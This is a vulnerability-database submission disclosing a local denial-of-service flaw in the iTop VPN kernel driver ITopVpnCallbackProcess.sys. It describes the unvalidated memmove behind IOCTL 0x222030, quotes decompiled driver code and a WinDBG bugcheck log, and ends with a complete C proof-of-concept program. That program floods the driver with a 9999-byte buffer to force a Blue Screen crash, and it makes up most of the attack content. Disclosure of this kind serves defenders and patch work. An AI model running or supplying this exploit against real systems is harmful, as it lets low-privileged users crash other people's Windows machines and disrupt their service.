| عنوان | IObit iTop VPN <= 4.0.0.1 Denial of Service |
|---|
| الوصف | /*
Exploit Title: iTop VPN "ITopVpnCallbackProcess.sys" <= x.x.x.x - Denial of Service
Date: 22/01/2023
Exploit Author: Mr Empy
Software Link: https://www.iobit.com/pt/recommend/itopvpn.php
Version: <= x.x.x.x
Tested on: Windows 10
=========================================
| DESCRIPTION |
=========================================
The version of the "ITopVpnCallbackProcess.sys" driver present in the iTop VPN product, up to version x.x.x.x, is vulnerable to a denial of service (DoS) attack due to a failure in inadequate validation of data passed via IOCTL code 0x222030.
A user with low privileges has the ability to communicate with the driver and send malicious data that is not properly validated.
When IOCTL code 0x222030 is triggered, the associated data is passed to the memmove function without proper validation, resulting in unexpected behavior. An attacker could exploit this flaw by sending specially manipulated data, leading to a denial of service on the system.
=========================================
====================================
| IMPACT |
====================================
Successful exploitation of this vulnerability can cause significant system disruption, leading to an operating system crash and resulting in the dreaded "Blue Screen of Death" (BSOD) with the error code "IRQL_NOT_LESS_OR_EQUAL". This results in temporary system unavailability, affecting the availability and reliability of the VPN service provided by iTop VPN.
====================================
=======================================
| VULN CODE |
=======================================
if (IOCTL == 0x222030) {
destAddress = 0;
userInput = *(void **)(param_2 + 0x18);
if (userInput != (void *)0x0) {
memmove(&destAddress,userInput,4);
}
local_34 = (uint)(0 < destAddress);
_DAT_1400052c0 = local_34;
goto LAB_1400024ff;
}
=======================================
=================================
| POC |
=================================
[*] Youtube video: https://www.youtube.com/watch?v=JdQMINPVJd8
[*] WinDBG Log:
*** Fatal System Error: 0x0000000a
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF801DD75245C)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
nt!DbgBreakPointWithStatus:
fffff801`dd7da300 cc int 3
0: kd> r
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=0000000000000000 rdi=0000000000000065
rip=fffff801dd7da300 rsp=ffffd0010a981f68 rbp=ffffd0010a9820d0
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000000000000003 r13=000000000000000a
r14=0000000000000000 r15=ffffe000bb764040
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!DbgBreakPointWithStatus:
fffff801`dd7da300 cc int 3
0: kd> !analyze -v
Connected to Windows 10 10240 x64 target at (Mon Jan 22 22:24:43.316 2024 (UTC - 3:00)), ptr64 TRUE
[...]
IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: 0000000000000000, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000001, bitfield :
bit 0 : value 0 = read operation, 1 = write operation
bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff801dd75245c, address which referenced memory
[...]
STACK_TEXT:
ffffd001`0a981f68 fffff801`dd87c4a2 : 00000000`0000000a 00000000`00000003 ffffd001`0a9820d0 fffff801`dd710888 : nt!DbgBreakPointWithStatus
ffffd001`0a981f70 fffff801`dd87bdd2 : 00000000`00000003 ffffd001`0a9820d0 fffff801`dd7e1710 00000000`0000000a : nt!KiBugCheckDebugBreak+0x12
ffffd001`0a981fd0 fffff801`dd7d4d24 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`dd9eb180 : nt!KeBugCheck2+0x93e
ffffd001`0a9826e0 fffff801`dd7df5a9 : 00000000`0000000a 00000000`00000000 00000000`00000002 00000000`00000001 : nt!KeBugCheckEx+0x104
ffffd001`0a982720 fffff801`dd7dddc8 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiBugCheckDispatch+0x69
ffffd001`0a982860 fffff801`dd75245c : 00000000`00000000 fffff800`924814b2 00000000`00000002 00000000`00000000 : nt!KiPageFault+0x248
ffffd001`0a9829f0 fffff800`92481dab : fffff800`92485300 ffffe000`bbc000f0 fffff800`92485408 00000000`00000af0 : nt!KeReleaseSemaphore+0x3c
ffffd001`0a982a80 fffff801`dd701094 : ffffe000`bd01aac0 ffffe000`bbc00da0 fffff801`dda61340 00000000`00000000 : ITopVpnCallbackProcess+0x1dab
ffffd001`0a982b00 fffff801`dd7007a9 : fffff801`dda61340 ffffe000`bb764040 fffff801`dd700fa0 fffff801`dda61340 : nt!IopProcessWorkItem+0xf4
ffffd001`0a982b70 fffff801`dd76d6d8 : ffffe000`b9e45040 00000000`00000080 fffff801`dda61340 ffffe000`bb764040 : nt!ExpWorkerThread+0xe9
ffffd001`0a982c00 fffff801`dd7d9d06 : fffff801`dd9eb180 ffffe000`bb764040 ffffe000`bb762040 00000000`00000000 : nt!PspSystemThreadStartup+0x58
ffffd001`0a982c60 00000000`00000000 : ffffd001`0a983000 ffffd001`0a97d000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x16
SYMBOL_NAME: ITopVpnCallbackProcess+1dab
MODULE_NAME: ITopVpnCallbackProcess
IMAGE_NAME: ITopVpnCallbackProcess.sys
STACK_COMMAND: .cxr; .ecxr ; kb
BUCKET_ID_FUNC_OFFSET: 1dab
FAILURE_BUCKET_ID: AV_ITopVpnCallbackProcess!unknown_function
OS_VERSION: 10.0.10240.16384
BUILDLAB_STR: th1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
FAILURE_ID_HASH: {9f243435-fbaa-6dba-f4e3-9c7f63052034}
Followup: MachineOwner
=================================
*/
#include <stdio.h>
#include <windows.h>
#define IOCTL_CODE 0x222030
#define DRIVER_PATH L"\\\\.\\ITopVpnCallbackProcess"
VOID Exploit() {
char payload[9999];
HANDLE hDriver = CreateFileW(DRIVER_PATH, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0x40000080, NULL);
if (hDriver == INVALID_HANDLE_VALUE) {
printf("[-] The ITopVpnCallbackProcess.sys service is not activated\n", GetLastError());
CloseHandle(hDriver);
exit(0);
}
puts("[+] Handle created! [ITopVpnCallbackProcess]");
for (int i = 0; i < 9999; i++) {
payload[i] = 'A';
}
puts("[+] Payload generated!");
puts("[*] Fuzzing Driver...");
DWORD temp = NULL;
for (int i = 0;i < 10;i++) {
BOOL deviceIoControlBool = DeviceIoControl(hDriver, IOCTL_CODE, &payload, sizeof(payload), NULL, NULL, &temp, NULL);
}
CloseHandle(hDriver);
puts("Attack finished! If the machine didn't return BSOD, maybe they fixed it.");
}
int main() {
Exploit();
return 0;
} |
|---|
| المصدر | ⚠️ https://www.youtube.com/watch?v=JdQMINPVJd8 |
|---|
| المستخدم | mrempy (UID 24379) |
|---|
| ارسال | 23/01/2024 03:22 AM (2 سنوات منذ) |
|---|
| الاعتدال | 02/02/2024 08:17 AM (10 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 252685 [iTop VPN حتى 4.0.0.1 IOCTL ITopVpnCallbackProcess.sys الحرمان من الخدمة] |
|---|
| النقاط | 17 |
|---|